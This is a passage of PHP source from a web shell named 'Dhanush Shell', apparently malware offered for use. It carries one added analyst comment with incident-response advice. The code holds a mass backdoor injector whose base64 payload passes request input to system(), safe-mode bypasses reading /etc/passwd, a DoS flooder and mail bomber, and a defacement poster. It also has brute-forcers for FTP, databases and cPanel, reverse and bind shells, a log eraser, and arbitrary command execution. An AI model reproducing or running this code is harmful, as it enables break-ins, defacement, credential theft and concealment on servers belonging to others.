3143 <td><a href=javascript:void(0) onClick="getdata('domains')"><font class=txt><b>| Get Domains |</b></font></a></td>
3144 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
3145 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
3146 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
3147 </tr></table></center><br>
3148 <div id="showdata"></div><?php
3149}
3150// Forum Manager
3151else if(isset($_REQUEST["forum"]))
3152{ ?>
3153 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
3154 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
3155 </tr></table></center><br><div id="showdata"></div>
3156 <?php
3157}
3158// Sec info
3159else if(isset($_GET['secinfo']))
3160{ ?><div id=showdata></div>
3161<center><div id="showmydata"></div>
3162</center>
3163<br><center><font color =red size=5>Server security information</font><br><br></center>
3164 <table style="width:100%;border-color:#333333;" border="1">
3165 <tr>
3166 <td style="width:7%;">Curl</td>
3167 <td style="width:7%;">Oracle</td>
3168 <td style="width:7%;">MySQL</td>
3169 <td style="width:7%;">MSSQL</td>
3170 <td style="width:7%;">PostgreSQL</td>
3171 <td style="width:12%;">Open Base Directory</td>
3172 <td style="width:10%;">Safe_Exec_Dir</td>
3173 <td style="width:7%;">PHP Version</td>
3174 <td style="width:7%;">Magic Quotes</td>
3175 <td style="width:7%;">Server Admin</td>
3176 </tr>
3177 <tr>
3178 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
3179 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
3180 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
3181 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
3182 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
3183 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
3184 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
3185 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
3186 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
3187 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
3188 </tr>
3189</table><br> <?php
3190 mysecinfo();
3191}
3192// Code Injector
3193
// Analyst note: "injector" form. This branch only renders the form; the write
// itself is done by the page's codeinjector() script function and a server-side
// handler, both outside this view. The form collects a directory (default: the
// shell's working directory), a mode ("Apender" or "Overwriter"), a file extension
// (default "php") and the code to insert. The pre-filled code is a base64 string
// that decodes to a short PHP snippet passing a request parameter to system(); the
// form's own caption describes it as a backdoor for every PHP file in the directory.
// Incident response: when this shell is found, treat every file of the chosen
// type under the affected directories as potentially modified. Compare them with
// known-good copies and look for the same PHP block repeated at the start or end
// of unrelated files.
3194else if(isset($_GET['injector']))
3195{
3196 ?>
3197 <form method='POST'>
3198 <table id="margins">
3199 <tr>
3200 <td width="100" class="title">
3201 Directory
3202 </td>
3203 <td>
3204 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3205 </td>
3206
3207 </tr>
3208 <tr>
3209 <td class="title">
3210 Mode
3211 </td>
3212 <td>
3213 <select style="width: 400px;" name="mode" class="box">
3214 <option value="Apender">Apender</option>
3215 <option value="Overwriter">Overwriter</option>
3216 </select>
3217 </td>
3218 </tr>
3219 <tr>
3220 <td class="title">
3221 File Type
3222 </td>
3223 <td>
3224 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3225 </td>
3226 </tr>
3227 <tr>
3228 <td>Create A backdoor by injecting this code in every php file of current directory</td>
3229 </tr>
3230
3231 <tr>
3232 <td colspan="2">
3233 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?></textarea>
3234 </td>
3235 </tr>
3236 <tr>
3237 <td rowspan="2">
3238 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
3239 </td>
3240 </tr>
3241 </form>
3242 </table><div id="showinject"</div>
3243 <?php
3244}
3245// Bypass
3246else if(isset($_GET["bypass"]))
3247{
3248 ?><center><div id="showbyp"></div></center>
3249 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;">
3250 <tr>
3251 <td align="center" colspan="2"><font color="#FF0000" size="3">Safe mode bypass</font></td>
3252 </tr>
3253 <tr>
3254 <td align="center">
3255 <p>Using copy() function</p>
3256 <form onSubmit="bypassfun('copy',copy.value);return false;">
3257 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
3258 </form>
3259 </td>
3260 <td align="center">
3261 <p>Using imap() function</p>
3262 <form onSubmit="bypassfun('imap',imap.value);return false;">
3263 <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',imap.value)" value="bypass" class="but">
3264 </form>
3265 </td>
3266 </tr>
3267
3268 <tr>
3269 <td align="center">
3270 <p>Using sql() function</p>
3271 <form onSubmit="bypassfun('sql',sql.value);return false;">
3272 <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sql.value)" value="bypass" class="but">
3273 </form>
3274 </td>
3275 <td align="center">
3276 <p>Using Curl() function</p>
3277 <form onSubmit="bypassfun('curl',curl.value);return false;">
3278 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
3279 </form>
3280 </td>
3281 </tr>
3282
3283 <tr>
3284 <td align="center">
3285 <p>Bypass using include()</p>
3286 <form onSubmit="bypassfun('include',include.value);return false;">
3287 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
3288 </form>
3289 </td>
3290 <td align="center">
3291 <p>Using id() function</p>
3292 <form onSubmit="bypassfun('id',id.value);return false;">
3293 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
3294 </form>
3295 </td>
3296 </tr>
3297
3298 <tr>
3299 <td align="center">
3300 <p>Using tempnam() function</p>
3301 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
3302 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
3303 </form>
3304 </td>
3305 <td align="center">
3306 <p>Using symlink() function</p>
3307 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
3308 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
3309 </form>
3310 </td>
3311 </tr>
3312 <tr>
3313 <td colspan=2 align="center">
3314 <p>Using Bypass function</p>
3315 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
3316 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
3317 <select id="optiontype" class=sbox>
3318 <option value="tac">tac</option>
3319 <option value="more">more</option>
3320 <option value="less">less</option>
3321 <option value="rev">rev</option>
3322 <option value="xxd">xxd</option>
3323 </select>
3324 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
3325 </form>
3326 </td>
3327 </tr>
3328 </table>
3329 </form>
3330 <?php
3331}
3332//fuzzer
3333else if(isset($_GET['fuzz']))
3334{
3335 ?>
3336 <form method="GET">
3337 <table id="margins">
3338 <tr>
3339 <td width="400" class="title">
3340 IP
3341 </td>
3342 <td>
3343 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3344 </td>
3345 </tr>
3346
3347 <tr>
3348 <td class="title">
3349 Port
3350 </td>
3351 <td>
3352 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3353 </td>
3354 </tr>
3355
3356 <tr>
3357 <td class="title">
3358 Timeout
3359 </td>
3360 <td>
3361 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
3362 </td>
3363 </tr>
3364
3365
3366 <tr>
3367 <td class="title">
3368 No of times
3369 </td>
3370 <td>
3371 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
3372 </td>
3373 </tr>
3374
3375 <tr>
3376 <td class="title">
3377 Message (The message Should be long and it will be multiplied with the value after it)
3378 </td>
3379 <td>
3380 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
3381 </td>
3382 <td>
3383 x
3384 </td>
3385 <td width="20">
3386 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
3387 </td>
3388 </tr>
3389
3390 <tr>
3391 <td rowspan="2">
3392 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
3393 </td>
3394 </tr>
3395 </table>
3396 </form><div id="showdos"></div>
3397 <?php
3398}
3399// Zone-h Poster
3400 else if(isset($_GET["zone"]))
3401 {
3402 if(!function_exists('curl_version'))
3403 {
3404 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
3405 }
3406 ?>
3407 <center><font size="4" color="#FF0000">Zone-h Poster</font></center>
3408 <form action="<?php echo $self; ?>" method="post">
3409 <table align="center" cellpadding="5" border="0">
3410 <tr>
3411 <td>
3412 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
3413 <tr><td>
3414 <select name="hackmode" class="box">
3415 <option >--------SELECT--------</option>
3416 <option value="1">known vulnerability (i.e. unpatched system)</option>
3417 <option value="2" >undisclosed (new) vulnerability</option>
3418 <option value="3" >configuration / admin. mistake</option>
3419 <option value="4" >brute force attack</option>
3420 <option value="5" >social engineering</option>
3421 <option value="6" >Web Server intrusion</option>
3422 <option value="7" >Web Server external module intrusion</option>
3423 <option value="8" >Mail Server intrusion</option>
3424 <option value="9" >FTP Server intrusion</option>
3425 <option value="10" >SSH Server intrusion</option>
3426 <option value="11" >Telnet Server intrusion</option>
3427 <option value="12" >RPC Server intrusion</option>
3428 <option value="13" >Shares misconfiguration</option>
3429 <option value="14" >Other Server intrusion</option>
3430 <option value="15" >SQL Injection</option>
3431 <option value="16" >URL Poisoning</option>
3432 <option value="17" >File Inclusion</option>
3433 <option value="18" >Other Web Application bug</option>
3434 <option value="19" >Remote administrative panel access bruteforcing</option>
3435 <option value="20" >Remote administrative panel access password guessing</option>
3436 <option value="21" >Remote administrative panel access social engineering</option>
3437 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
3438 <option value="23" >Access credentials through Man In the Middle attack</option>
3439 <option value="24" >Remote service password guessing</option>
3440 <option value="25" >Remote service password bruteforce</option>
3441 <option value="26" >Rerouting after attacking the Firewall</option>
3442 <option value="27" >Rerouting after attacking the Router</option>
3443 <option value="28" >DNS attack through social engineering</option>
3444 <option value="29" >DNS attack through cache poisoning</option>
3445 <option value="30" >Not available</option>
3446 </select>
3447 </td></tr>
3448 <tr><td>
3449 <select name="reason" class="box">
3450 <option >--------SELECT--------</option>
3451 <option value="1" >Heh...just for fun!</option>
3452 <option value="2" >Revenge against that website</option>
3453 <option value="3" >Political reasons</option>
3454 <option value="4" >As a challenge</option>
3455 <option value="5" >I just want to be the best defacer</option>
3456 <option value="6" >Patriotism</option>
3457 <option value="7" >Not available</option>
3458 </select></td></tr>
3459 <tr><td>
3460 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
3461 <tr><td>
3462 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
3463 </form><div id="showzone"></div>
3464 <?php }
3465//DDos
3466 else if(isset($_GET['dos']))
3467 {
3468 ?>
3469 <form method="GET">
3470 <table id="margins">
3471 <tr>
3472 <td width="400" class="title">
3473 IP
3474 </td>
3475 <td>
3476 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
3477 </td>
3478 </tr>
3479
3480 <tr>
3481 <td class="title">
3482 Port
3483 </td>
3484 <td>
3485 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
3486 </td>
3487 </tr>
3488
3489 <tr>
3490 <td class="title">
3491 Timeout <font >(Time in seconds)</font>
3492 </td>
3493 <td>
3494 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
3495 </td>
3496 </tr>
3497 <tr>
3498 <td class="title">
3499 Execution Time <font >(Time in seconds)</font>
3500 </td>
3501 <td>
3502 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
3503 </td>
3504 </tr>
3505 <tr>
3506 <td class="title">
3507 No of Bytes per/packet
3508 </td>
3509 <td>
3510 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
3511 </td>
3512 </tr>
3513 <tr>
3514 <td rowspan="2">
3515 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
3516 </td>
3517 </tr>
3518 </table>
3519 </form><div id="showdos"></div>
3520 <?php
3521}
3522else if(isset($_GET['mailbomb']))
3523{ ?>
3524 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
3525 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
3526<?php
3527}
3528else if(isset($_GET['tools']))
3529 {
3530 ?>
3531 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
3532 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
3533 <tr>
3534 <td colspan="2" align="center"><b><font size='4' color="#FF0000">Port Scanner<br></font></b></td>
3535 </tr>
3536 <tr>
3537 <td align="center">
3538 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
3539 </td>
3540 <td align="center">
3541 <select class="sbox" name='protocol'>
3542 <option value='tcp'>tcp</option>
3543 <option value='udp'>udp</option>
3544 </select>
3545 </td>
3546 <tr>
3547 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
3548 </tr>
3549 </form>
3550 <tr><td colspan=2><div id="showports"></div>
3551 </td></tr></table>
3552
3553 <br>
3554 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
3555 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
3556 <tr>
3557 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
3558 </tr>
3559 <tr>
3560 <td>Type : </td>
3561 <td>
3562 <select name="prototype" class="sbox">
3563 <option value="ftp">FTP</option>
3564 <option value="mysql">MYSQL</option>
3565 <option value="postgresql">PostgreSql</option>
3566 </select>
3567 </td>
3568 </tr>
3569 <tr>
3570 <td>Server <b>:</b> Port : </td>
3571 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
3572 </tr>
3573 <tr>
3574 <td valign="middle">Brute type : </td>
3575 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
3576 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
3577 Login : <input type="text" name="login" value="root" class="sbox"><br>
3578 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
3579 </td>
3580 </tr>
3581 <tr>
3582 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
3583 </tr>
3584 </form><tr><td colspan="2" id="showbrute"></td></tr>
3585 </table>
3586 </center><br>
3587 <?php
3588}
3589else if (isset($_GET["phpc"]))
3590{
3591 ?>
3592 <div id="showresult"></div>
3593 <form name="frm">
3594 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
3595 <br /><br />
3596 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
3597 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
3598 </form>
3599 <?php
3600}
3601else if(isset($_GET["exploit"]))
3602{
3603 if(!isset($_GET["rootexploit"]))
3604 {
3605 ?>
3606 <center>
3607 <form action="<?php echo $self; ?>" method="get" target="_blank">
3608 <input type="hidden" name="exploit">
3609 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
3610 <tr>
3611 <td style="height:60px;">
3612 <font size="4" class=txt>Select Website</font></td><td>
3613 <p><select id="rootexploit" name="rootexploit" class="box">
3614 <option value="exploit-db">Exploit-db</option>
3615 <option value="packetstormsecurity">Packetstormsecurity</option>
3616 <option value="exploitsearch">Exploitsearch</option>
3617 <option value="shodanhq">Shodanhq</option>
3618 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
3619 <input type="submit" value="Search" class="but"></td></tr></table>
3620 </form></center><br>
3621
3622 <?php
3623 }
3624 else
3625 {
3626 //exploit search
3627 $Lversion = php_uname(r);
3628 $OSV = php_uname(s);
3629 if(eregi('Linux',$OSV))
3630 {
3631 $Lversion=substr($Lversion,0,6);
3632 if($_GET['rootexploit'] == "exploit-db")
3633 {
3634 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
3635 }
3636 else if($_GET['rootexploit'] == "packetstormsecurity")
3637 {
3638 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
3639 }
3640 else if($_GET['rootexploit'] == "exploitsearch")
3641 {
3642 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
3643 }
3644 else if($_GET['rootexploit'] == "shodanhq")
3645 {
3646 header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
3647 }
3648 }
3649 else
3650 {
3651 $Lversion=substr($Lversion,0,3);
3652 if($_GET['rootexploit'] == "exploit-db")
3653 {
3654 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
3655 }
3656 else if($_GET['rootexploit'] == "packetstormsecurity")
3657 {
3658 header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
3659 }
3660 else if($_GET['rootexploit'] == "exploitsearch")
3661 {
3662 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
3663 }
3664 else if($_GET['rootexploit'] == "shodanhq")
3665 {
3666 header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
3667 }
3668 }
3669 //End of Exploit search
3670 }
3671}
3672// Connect
3673else if(isset($_REQUEST['connect']))
3674{
3675 ?>
3676 <form action='<?php echo $self; ?>' method='POST' >
3677 <table style="width:50%" align="center" >
3678 <tr>
3679 <th colspan="1" width="50px">Reverse Shell</th>
3680 <th colspan="1" width="50px">Bind Shell</th>
3681 </tr>
3682 <tr>
3683 <td>
3684 <table style="border-spacing: 6px;">
3685 <tr>
3686 <td>IP </td>
3687 <td>
3688 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
3689 </td>
3690 </tr>
3691 <tr>
3692 <td>Port </td>
3693 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
3694 </tr>
3695 <tr>
3696 <td style="vertical-align:top;">Use:</td>
3697 <td><select style="width: 95px;" name="lang" class="sbox">
3698 <option value="perl">Perl</option>
3699 <option value="python">Python</option>
3700 <option value="php">PHP</option>
3701 </select>
3702 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
3703 </tr>
3704 </table> </form>
3705 </td>
3706
3707 <td style="vertical-align:top;">
3708 <form method='post' >
3709 <table style="border-spacing: 6px;">
3710 <tr>
3711 <td>Port</td>
3712 <td>
3713 <input style="width: 200px;" class="box" name="port" value="9891" />
3714 </td>
3715 </tr>
3716 <tr>
3717 <td>Password </td>
3718 <td>
3719 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
3720 </td>
3721 <tr>
3722 <td>Using</td>
3723 <td>
3724 <select style="width: 95px;" name="lang" id="lang" class="sbox">
3725 <option value="perl">Perl</option>
3726 <option value="c">C</option>
3727 </select>
3728 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
3729 </tr>
3730 </table>
3731 </td>
3732 </form>
3733 </tr>
3734 <tr><td colspan=2><font color="#FF0000">Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</font></td></tr>
3735 </table>
3736
3737 <?php
3738 }
3739
3740else if(isset($_REQUEST['404']))
3741{
3742 ?>
3743 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
3744 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
3745 </tr></table></center><br>
3746 <div id="showdata"></div>
3747 <?php
3748}
3749else if(isset($_GET['about']))
3750 { ?>
3751 <center>
3752 <p><font size=6><u>D h a n u s h</u></font><br>
3753 <font size=5>[--==Coded By Arjun==--]</font>
3754 <div style='font-family: Courier New; font-size: 10px;'><font class=txt ><pre>
3755
3756 - -- -
3757 -- -- --
3758 -- --
3759 --- ---
3760 ------
3761 ----
3762 ----
3763 ------
3764-------
3765--- --
3766 -- ---
3767 -- -----
3768 --- --- ---
3769 --- --- ---
3770-- --------- --
3771-- ------- --
3772 -- ---- --
3773 -- --- --
3774 -- -- --
3775 --- --- -- ---
3776 ------ ------
3777 ---- ----
3778
3779
3780 </pre></font></div></center>
3781 <font class="txt">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server.The developer of the script is not responsible for any damage or misuse of it</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
3782 <?php }
3783else if(isset($_GET['database']))
3784{ ?>
3785 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
3786 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
3787 <tr>
3788 <td colspan="2">Connect To Database</td>
3789 </tr>
3790 <tr>
3791 <td>Server Address :</td>
3792 <td><input type="text" class="box" name="server" value="localhost"></td>
3793 </tr>
3794 <tr>
3795 <td>Username :</td>
3796 <td><input type="text" class="box" name="username" value="root"></td>
3797 </tr>
3798 <tr>
3799 <td>Password:</td>
3800 <td><input type="text" class="box" name="password" value=""></td>
3801 </tr>
3802
3803 <tr>
3804 <td></td>
3805 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
3806 </tr>
3807 </table>
3808 </form>
3809 <div id="showsql"></div>
3810<?php
3811}
3812// Cpanel Cracker
3813 else if(isset($_REQUEST['cpanel']))
3814 {
3815 $cpanel_port="2082";
3816 $connect_timeout=5;
3817 ?>
3818 <center>
3819 <form method=post>
3820 <table style="width:50%;border-color:#333333;" border=1 cellpadding=4>
3821 <tr>
3822 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
3823 </tr>
3824 <tr>
3825 <td align=center>User names</td><td align=center>Password</td>
3826 </tr>
3827 <tr>
3828 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
3829 if($os != "Windows")
3830 {
3831 if(@file('/etc/passwd'))
3832 {
3833 $users = file('/etc/passwd');
3834 foreach($users as $user)
3835 {
3836 $user = explode(':', $user);
3837 echo $user[0] . "\n";
3838 }
3839 }
3840 else
3841 {
3842 $temp = "";
3843 $val1 = 0;
3844 $val2 = 1000;
3845 for(;$val1 <= $val2;$val1++)
3846 {
3847 $uid = @posix_getpwuid($val1);
3848 if ($uid)
3849 $temp .= join(':',$uid)."\n";
3850 }
3851
3852 $temp = trim($temp);
3853
3854 if($file5 = fopen("test.txt","w"))
3855 {
3856 fputs($file5,$temp);
3857 fclose($file5);
3858
3859 $file = fopen("test.txt", "r");
3860 while(!feof($file))
3861 {
3862 $s = fgets($file);
3863 $matches = array();
3864 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
3865 $matches = str_replace("home/","",$matches[1]);
3866 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
3867 continue;
3868 echo $matches;
3869 }
3870 fclose($file);
3871 }
3872 }
3873 }
3874
3875 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
3876 </tr>
3877 <tr>
3878 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
3879 </tr>
3880 <tr>
3881 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
3882 </tr>
3883 <tr>
3884 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
3885 </tr>
3886 </table>
3887 </form>
3888 </center>
3889 <?php
3890}
3891else if(isset($_REQUEST['malattack']))
3892{
3893 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
3894 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
3895 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
3896 <div id="showdata"></div>
3897 <?php
3898}
3899else if(isset($_GET["com"]))
3900{
3901 echo "<br>";
3902 ob_start();
3903 eval("phpinfo();");
3904 $b = ob_get_contents();
3905 ob_end_clean();
3906 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
3907 $z = strpos($b,"</body>");
3908 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
3909 echo $s_result;
3910}
3911else if(isset($_GET['execute']))
3912{
3913 $comm = $_GET['execute'];
3914 chdir($_GET['executepath']);
3915 $check = shell_exec($comm);
3916
3917 echo "<center><textarea id=showexecute cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3918
3919 ?>
3920 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
3921 <input type="text" class="box" name="execute">
3922 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but"></form></center>
3923 <?php
3924}
3925else if(isset($_GET['mycmd']))
3926{
3927 if($_GET['mycmd']=="logeraser")
3928 {
3929 $erase = gzinflate(base64_decode("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"));
3930 if(is_writable("."))
3931 {
3932 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
3933 {
3934 fwrite($openp, $erase);
3935 fclose($openp);
3936 passthru("perl logseraser.pl linux");
3937 unlink("logseraser.pl");
3938 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3939 }
3940 } else
3941 {
3942 if($openp = fopen("/tmp/logseraser.pl", 'w'))
3943 {
3944 fwrite($openp, $erase)or die("Error");
3945 fclose($openp);
3946 $aidx = passthru("perl logseraser.pl linux");
3947 unlink("logseraser.pl");
3948 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
3949 }
3950 }
3951 }
3952 else
3953 {
3954 $check = shell_exec($_GET['mycmd']);
3955 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
3956 }
3957}
3958else if(isset($_GET['prototype']))
3959{
3960 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
3961 if( $_GET['prototype'] == 'ftp' )
3962 {
